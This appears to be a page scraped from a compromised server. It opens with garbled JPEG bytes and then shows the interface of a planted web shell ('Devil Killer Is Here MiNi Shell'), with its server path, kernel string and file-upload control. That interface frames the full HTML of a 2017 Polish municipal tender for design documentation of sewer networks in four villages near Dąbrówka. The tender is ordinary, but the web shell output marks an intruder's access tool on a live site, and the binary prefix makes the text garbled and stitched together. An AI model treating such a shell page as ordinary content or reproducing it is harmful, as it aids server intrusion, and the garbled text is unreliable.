JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170206/20365-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://ww.bip.dabrowka.net.pl' target='_blank'>http://ww.bip.dabrowka.net.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 20365 - 2017
              z dnia 2017-02-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Dąbrówka: Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Chajęty, Guzowatka, Trojany i Zaścienie.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Dąbrówka, krajowy numer identyfikacyjny
              53369900000, ul.
              ul. T. Kościuszki 
              14,
              05252  
              Dąbrówka, woj.
              mazowieckie, państwo
              Polska, tel.
              029 7578002, 7578077, e-mail
              urzad@dabrowka.net.pl, faks
              297 578 220.
              <br />
              Adres strony internetowej (URL): www.bip.dabrowka.net.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dabrowka.net.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />ww.bip.dabrowka.net.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Gminy Dąbrówka, Biuro Obsługi Mieszkańca, ul. Tadeusza Kościuszki 14, 05-252 Dąbrówka,</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Chajęty, Guzowatka, Trojany i Zaścienie.<br /><b>Numer referencyjny: </b>271.01.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiot zamówienia obejmuje sporządzenie dokumentacji projektowo - kosztorysowej sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Zadanie nr 1 - Chajęty i Guzowatka o długości około 6,5 km; Zadanie nr 2 - Trojany i Zaścienie o długości około 4,5 km. Długość kanalizacji tłocznej uzależniona będzie od ilości zaprojektowanych przepompowni sieciowych. Sieć należy zaprojektować w drogach powiatowych i gminnych.
Podana  długość jest jedynie szacunkowa i nie jest dla projektanta wiążąca - jej zmiana nie będzie stanowiła podstawy do zmiany wartości umowy.
Sieć kanalizacyjna będąca przedmiotem zamówienia, musi zostać zaprojektowana w taki sposób aby współpracowała z istniejącą siecią kanalizacyjną: dla miejscowości Trojany i Zaścienie włączenie na granicy miejscowości Karpin i Trojany, dla miejscowości Chajęty i Guzowatka włączenie w miejscowości Małopole.      
Kolektory kanalizacji sanitarnej wraz z odgałęzieniami sieci do granicy działek użytkowników należy zaprojektować w sposób umożliwiający podłączenie grawitacyjne indywidualnych użytkowników. W projekcie należy również wskazać trasę  przyłącza kanalizacyjnego od granicy nieruchomości do istniejącego lub projektowanego budynku.
Zamawiający załącza do SIWZ poglądowe szkice proponowanego przebiegu sieci kanalizacyjnej i Program Gospodarki Ściekowej dla Gminy Dąbrówka do ewentualnego wykorzystania przez Wykonawców przy ocenie zakresu zamówienia.
3.1. Zakres prac projektowych obejmuje opracowanie dla każdego zadania:
a) podkładów mapowych do celów projektowych,
b) projektu budowlanego -5 egz. w zakresie niezbędnym do złożenia wniosku i uzyskaniu przez  Wykonawcę decyzji pozwolenia na budowę , 
c) projektu wykonawczego  w rozbiciu na branże - 5  egz.,
d) specyfikacji technicznej wykonania i odbioru robót - 2 egz.,  
e) przedmiarów robót  -2 egz. z podziałem na sieć grawitacyjną do granicy działek, kanalizację tłoczną z przepompowniami ścieków  oraz oddzielnie na przyłącza kanalizacyjne na odcinku od granicy nieruchomości do istniejącego lub projektowanego w raz z ze zbiorczym zestawieniem przyłączy (nr działki, właściciel, długość przyłącza, ilość studzienek kanalizacyjnych, szamba przewidziane do likwidacji ).   
Przedmiar robót musi obejmować zestawienie wszystkich robót wynikających z projektu.
Poszczególne działania opisane w przedmiarze muszą być podzielone na grupy robót wg takiego podziału jaki jest przyjęty w STWiORB. 
Przedmiar będzie stanowił podstawę do wyliczenia ceny przez Wykonawcę robót budowlanych w zamówieniu publicznym na realizację zadań, dlatego Zamawiający wymaga, aby był on sporządzony w układzie tabelarycznym zgodnym z § 10 Rozporządzenia Ministra Infrastruktury (Dz.U.2004.202.2072) oraz dodatkowo uzupełniony o kolumny cena jednostkowa i wartość,
f) kosztorysów inwestorskich- 2 egz. ( na podstawie przedmiarów) z podaniem nazw i kodów określonych we wspólnym słowniku zamówień, 
g) sporządzenie operatów wodno - prawnych i uzyskanie zgody na przejście pod ciekami wodnymi wraz z uzyskaniem pozwolenia wodno - prawnego - jeśli będzie wymagane,
h) przeprowadzenie procedury oceny oddziaływania na środowisko przedsięwzięcia wraz z przygotowaniem wniosku i niezbędnych załączników do wydania decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia (tj. raport oddziaływania na środowisko, przebieg sieci wkreślony na mapach ewidencyjnych, itd.) - jeśli będzie wymagane, 
i) uzyskanie wszelkich koniecznych warunków, decyzji, zgód, opinii oraz uzgodnień branżowych - w formie pisemnej i elektronicznej, 
3.2. Forma  opracowań:
a) dokumentacja projektowa, przedmiary robót i kosztorys inwestorski  w formie papierowej  i  na nośniku CD w formacie umożliwiającym ich odczyt i drukowanie przy wykorzystaniu bezpłatnego oprogramowania.
b) przynajmniej 2 egz. projektu budowlanego muszą być opieczętowane przez organ wydający pozwolenie na budowę.
c) wykonawca  przystąpi do końcowej edycji dokumentacji projektowej po uzgodnieniu jej z Zamawiającym i Zakładem Gospodarki Komunalnej w Dąbrówce,
d) wykonawca zobowiązany jest do sporządzenia wersji przetargowej projektu oraz przedmiaru robót w sposób określony w art. 29-31 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t. j. Dz. U. z 2015 r. poz. 2164 z późn.zm.)
3.3 Wykonawca zobowiązany jest do:
a) uzyskania zgody właścicieli, współwłaścicieli lub spadkobierców nieruchomości w formie oświadczeń pisemnych na przejście z projektowaną siecią kanalizacyjną  przez ich teren i ustanowienia służebności przesyłu na rzecz Gminy Dąbrówka,
b) uzyskanie zgody właścicieli, współwłaścicieli lub spadkobierców nieruchomości w formie oświadczeń pisemnych wraz załącznikiem graficznym z przedstawiającym lokalizacje sieci i przyłącza oraz zgodę lub odmowę na wykonanie sieci i przyłącza kanalizacyjnego, 
c) sporządzenie wykazu działek po których przebiega sieć kanalizacyjna oraz wykazu działek, dla których projektuje się przyłącza kanalizacyjne ( z wykazem właścicieli/zarządców),
d) wykonanie inwentaryzacji zieleni oraz wskazanie drzew przewidzianych do usunięcia/przesadzenia, które kolidują z projektowaną siecią kanalizacyjną,  
e)  uzyskania z upoważnienia zamawiającego decyzji udzielającej inwestorowi pozwolenia na budowę.
3.4.  Wszelkie opłaty administracyjne ponoszone w wyniku prowadzonych działań związanych z uzyskiwaniem opinii, badań, uzgodnień czy decyzji, wykonawca winien wliczyć do ceny opracowania dokumentacji projektowej w tym min.:
a) Uzyskania aktualnych podkładów geodezyjnych do celów projektowych.
b) Uzyskanie wypisów z miejscowego planu zagospodarowania  orz wypisów z rejestru gruntów
c) Wykonania badań geologicznych i dokumentacji przy założeniu wykonywania otworów pod każdą przepompownię ścieków oraz na trasie kanału grawitacyjnego w zależności od potrzeb, jednak nie mniej niż 1 otwór  na każdy rozpoczęty kilometr kanalizacji grawitacyjnej.
d) Opracowanie projektu organizacji ruchu na czas budowy- jeśli będzie wymagany
e) Przygotowanie wniosku o określenie warunków przyłączenia do sieci elektroenergetycznej przepompowni ścieków 
f) Opracowanie instrukcji zasilenia rezerwowego przepompowni agregatem prądotwórczym 
g) Uzyskania wszelkich nie wymienionych wyżej, a koniecznych dokumentów formalno-prawnych i pokrewnych, własnym staraniem.
W celu prawidłowego sporządzenia oferty Wykonawca winien przeprowadzić szczegółową wizję lokalną w celu uzyskania wszystkich niezbędnych informacji, co do ryzyka, trudności 
i wszelkich innych okoliczności, jakie mogą wystąpić.
3.5. Stan aktualny
a)	Miejscowości przewidziane do zaprojektowania sieci kanalizacyjnej objęte są miejscowym planem zagospodarowania przestrzennego. 
b)	Sieć i urządzenia kanalizacyjne będą zlokalizowane w pasie dróg  powiatowych i gminnych oraz na działkach prywatnych.  
c)	Uzbrojenie terenu: sieć gazowa i wodociągowa z przyłączami, przewody energetyczne 
napowietrzne i  kablowe oraz telekomunikacyjne. 
3.6. Pomoc techniczna 
Na etapie postępowania mającego na celu wybór wykonawcy robót: "Budowa sieci kanalizacyjnej wraz z przyłączami w miejscowościach Chajęty, Guzowatka, Trojany i Zaścienie" projektant będzie współpracował z zamawiającym w zakresie odpowiedzi na pytania wykonawców związane z Projektem Budowlanym i Wykonawczym. Wykonawca zobowiązany będzie do pełnienia nadzoru autorskiego w czasie trwania prac budowlanych, tj. od chwili rozpoczęcia robót do odbioru końcowego. Umowa na pełnienie nadzoru autorskiego zostanie zawarta z wykonawcą na oddzielnych zasadach
Kody Wspólnego Słownika Zamówień: 
71320000-7	Usługi inżynieryjne w zakresie projektowania
71248000-8   Nadzór nad projektem i dokumentcją
2. Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę wymienionych w niniejszej specyfikacji części zamówienia - zadania od 1 do 2. 
2.1 Przedmiot zamówienia w zakresie zadania nr 1 dotyczy Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Chajęty i Guzowatka. .
Zgodnie z opisem przedmiotu zamówienia w pkt. 1

2.2 Przedmiot zamówienia w zakresie zadania nr 2 dotyczy Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Trojany i Zaścienie.
Zgodnie z opisem przedmiotu zamówienia w pkt. 1


3. Zamawiający nie dopuszcza możliwości składania ofert wariantowych

4. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej

5. Zamawiający nie dopuszcza możliwości udzielenia zamówień uzupełniających.
6. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części zamówienia podwykonawcom:
6.1 Zamawiający nie wprowadza zastrzeżenia wskazującego na obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
6.2 W przypadku powierzenia wykonania części zamówienia podwykonawcy, Wykonawca zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
6.3 Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w pkt. 5.3 niniejszej Specyfikacji (art. 22a ust. 1 ustawy Pzp.), w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby zamawiający powoływał się w trakcie postępowania o udzielenie zamówienia. 
6.4 Wykonawca zobowiązany będzie przedstawić na wezwanie zamawiającego dokumenty, o których mowa w pkt. 7.2. ppkt. 1 - 9 w odniesieniu do podwykonawców.
6.5 Jeżeli powierzenie podwykonawcy wykonania części zamówienia na roboty budowlane lub usługi następuje w trakcie jego realizacji, wykonawca na żądanie zamawiającego przedstawi oświadczenie, o którym mowa w art. 25a ust. 1 ustawy Pzp lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy. Obowiązek ten   nie dotyczy dalszych  podwykonawców.  
6.6 Jeżeli zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, wykonawca obowiązany jest zastąpić tego podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia podwykonawcy.
6.7 Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia wykonawcy z odpowiedzialności za należyte wykonanie zamówienia.
7. Wymagania stawiane wykonawcy:
7.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
7.2 Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
7.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
7.4 Określenie przez wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
7.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia. 

9 Wymagania organizacyjne
Nie dotyczy

10 Wymagania dot. gwarancji
     Nie dotyczy
10.1 Wymagania dot. rękojmi
 Zamawiający wspólnie z Wykonawcą dokumentacji projektowo-kosztorysowej rozszerzają odpowiedzialność Wykonawcy dokumentacji projektowo-kosztorysowej z tytułu rękojmi za wady fizyczne przedmiotu umowy. Termin rękojmi skończy się wraz z upływem  terminu odpowiedzialności z tytułu rękojmi za wady Wykonawcy robót budowlanych wykonywanych na podstawie dokumentacji będącej przedmiotem niniejszej umowy.

<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><b> Dodatkowe kody CPV:</b>71248000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                działalność zawodowa prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych kompetencji lub uprawnień.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wymagane jest spełnienie minimalnych warunków dotyczących wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie jakości. 
Zamawiający żąda od Wykonawców , aby  udokumentowali posiadanie wiedzy i doświadczenia poprzez wykazanie  w okresie ostatnich 3 lat przed upływem terminu składania  ofert , a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie realizacji dwóch  usług   polegających   na wykonaniu dokumentacji projektowo-kosztorysowej zawierającej w swym zakresie  budowę lub przebudowę  kanalizacji sanitarnej  o długości minimum 1,0 km każda , w tym zakresie co najmniej w jednej dokumentacji będzie kanalizacja tłoczna i przepompownia ścieków - sporządzenie wykazu wykonanych usług załącznik nr 4.
Za wykonanie więcej niż dwóch dokumentacji projektowych kanalizacji sanitarnej będą przydzielane punkty w kryterium doświadczenie. Za każdą następną dokumentację projektowo-kosztorysową kanalizacji sanitarnej lub deszczowej o długości min. 500 mb Wykonawca otrzyma 10 punktów, maksymalnie 40 punktów.

b) że dysponuje osobami: 

        -  Wykonawcy dysponują osobami zdolnymi do wykonywania zamówienia , które będą uczestniczyć w wykonywaniu zamówienia tj. posiadającymi uprawnienia do projektowania  określone przepisami  Prawa budowlanego  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  ( 1 osoba) 
Zaproponowana  osoba   oprócz posiadania uprawnień do projektowania  musi  posiadać odpowiednie doświadczenie tj. być projektantem co najmniej 1 dokumentacji projektowej zawierających  w swym  zakresie budowę  lub przebudowę  kanalizacji sanitarnej grawitacyjnej i tłocznej o długości min. 1,0 km. 
Proponowana osoba do projektowania musi posiadać  uprawnienia , o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2016, poz. 290 ze zm.) oraz Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r, w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65) lub zgodnie z wcześniej obowiązującymi przepisami dotyczące uznawania kwalifikacji.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
